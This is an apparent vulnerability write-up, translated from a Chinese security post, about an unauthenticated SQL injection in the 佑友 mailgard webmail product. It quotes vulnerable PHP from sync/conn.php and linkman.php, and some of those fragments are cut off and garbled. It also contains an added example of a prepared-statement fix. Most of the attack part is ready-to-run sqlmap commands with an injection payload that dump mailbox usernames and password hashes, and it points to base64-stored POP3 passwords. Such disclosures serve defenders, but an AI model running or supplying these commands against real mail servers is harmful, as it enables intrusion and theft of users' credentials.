
    An unauthenticated SQL injection in 佑友 mailgard webmail

    Posted by 没穿底裤 on 2015-06-07 16:43:00

    ./sync/linkman.php contains an obvious SQL injection ($group_id); the code is as follows.

    Because the file does not include global.php, the global input filtering never runs, and the script can be reached without logging in. If magic_quotes_gpc is off it is injectable (the system ships with magic_quotes_gpc disabled).

    ".$rs['group_id']."".$rs['group_name']."";
            $sqlg = "SELECT * FROM `groups` WHERE `fid`='".$rs['group_id']."' ".$query;
            $resg = mysql_query($sqlg);
            if($rsg = mysql_fetch_array($resg)){
                outputUsers($export_range,$rs['group_id'],$part+1);
            }
            // list the contacts in this group
            $sqll = "SELECT * FROM `linkman` WHERE `group_id`='".$rs['group_id']."' $query2 ORDER BY convert(`name` using GBK) ";
            $resl = mysql_query($sqll);
            while ($rsl=mysql_fetch_array ($resl)) {
                echo "
                    ".$rsl['mail_addr']."
                    ".$rsl['name']."
                    ";
            }
            echo "";
        }
    }
    $group_id = $_POST['group_id'] ? $_POST['group_id'] : $_GET['group_id'];
    $export_range = $_POST['export_range'] ? $_POST['export_range'] : $_GET['export_range'];
    echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
    echo '';
    echo '';
    outputUsers('public');
    echo '';
    echo '';
    outputUsers();
    echo '';
    echo '';
    ?>

    Now look at conn.php, which linkman.php includes: the injection there is just as obvious ($name and $token).
    Again, global.php is not included, so the global filtering does not apply and no login is required; with magic_quotes_gpc off (the system default) it is injectable.

    =3) {
                    mysql_query("UPDATE `define_para` SET `trydate`=".time()." WHERE `user_name`='$name'  ");
                    setError('Try too frequently, please try again after two minutes');
                }else{
                    if($row['password'] != crypt($token,$row["password"])){
                        $sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
                        $result = mysql_query($sql);
                        if($rs = mysql_fetch_array($result)) {
                            if(time()-$rs['trydate']<120) {
                                $rs['trytimes']++;
                                mysql_query("UPDATE `define_para` SET `trytimes`=`trytimes`+1 WHERE `user_name`='$name'  ");
                            }else{
                                $rs['trytimes'] = 1;
                                mysql_query("UPDATE `define_para` SET `trydate`='".time()."',`trytimes`=1 WHERE `user_name`='$name'  ");
                            }
                        }
                        if( (3-$rs['trytimes'])>0 ){
                            setError(sprintf('Login fails, you can try %d times', (3-$rs['trytimes'])));
                        }else{
                            setError('Try too frequently, please try again after two minutes');
                        }
                    }
                }
            }
        }
    }

    function setError($msg){
        echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
        echo "$msg";
        exit;
    }
    ?>
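    As an added example (not code from the vendor or from the post's author), here is the conn.php check above rewritten with mysqli prepared statements, so $name and $token are bound parameters rather than query text. Table and column names are taken from the fragment; the mysqli connection and the XML error envelope are assumptions, and hash_equals() replaces the original's != comparison.

```php
<?php
// Added example, not the vendor's code: the conn.php lookup rewritten with
// mysqli prepared statements so $name and $token are bound, never concatenated.
// Table and column names follow the fragment above; the mysqli connection is assumed.
const MAX_TRIES = 3;
const LOCKOUT_SECONDS = 120;

function syncLogin(mysqli $db, string $name, string $token): bool
{
    $stmt = $db->prepare(
        'SELECT `password`, `trydate`, `trytimes` FROM `define_para` WHERE `user_name` = ?'
    );
    $stmt->bind_param('s', $name);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null) {
        setError('Login fails');
    }

    $inWindow = (time() - (int)$row['trydate']) < LOCKOUT_SECONDS;
    if ($inWindow && (int)$row['trytimes'] >= MAX_TRIES) {
        setError('Try too frequently, please try again after two minutes');
    }

    // Constant-time comparison of the stored crypt() hash with the token's hash.
    if (hash_equals($row['password'], crypt($token, $row['password']))) {
        return true;
    }
    // Failed attempt: continue the current lockout window or open a new one.
    $tries = $inWindow ? (int)$row['trytimes'] + 1 : 1;
    $now = time();
    $upd = $db->prepare(
        'UPDATE `define_para` SET `trydate` = ?, `trytimes` = ? WHERE `user_name` = ?'
    );
    $upd->bind_param('iis', $now, $tries, $name);
    $upd->execute();
    $left = MAX_TRIES - $tries;
    setError($left > 0 ? sprintf('Login fails, you can try %d times', $left)
                       : 'Try too frequently, please try again after two minutes');
    return false;
}

function setError(string $msg): void
{
    header('Content-Type: text/xml; charset=utf-8');
    echo '<?xml version="1.0" encoding="utf-8"?><error>', htmlspecialchars($msg), '</error>';
    exit;
}
```

    With the parameters bound, a quote in $name only changes the compared value; the same change applies to the `group_id` queries in linkman.php.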

    The system first runs the conn.php code to authenticate and only then runs the linkman.php code,
    so to inject we have to start from conn.php.
    Run sqlmap:

    sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token;=1" --dbms=mysql --technique=B --dbs --threads=5

    Mailbox account names and passwords are stored in hicommail.mailbox; sqlmap can dump them directly:

    sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token;=1" --dbms=mysql --technique=B --threads=5 -D hicommail -T mailbox -C username,password --dump

    The passwords are hashed with PHP crypt($password,$md5salt), for example $1$08ab2d3c$G1Q/PyedrHxQdfGXOmga0/, and cracking this format takes time.
    However, another table (hicommail.popmanage) holds a small number of POP3 passwords in plaintext, merely base64-encoded; to protect the users they are not posted here.
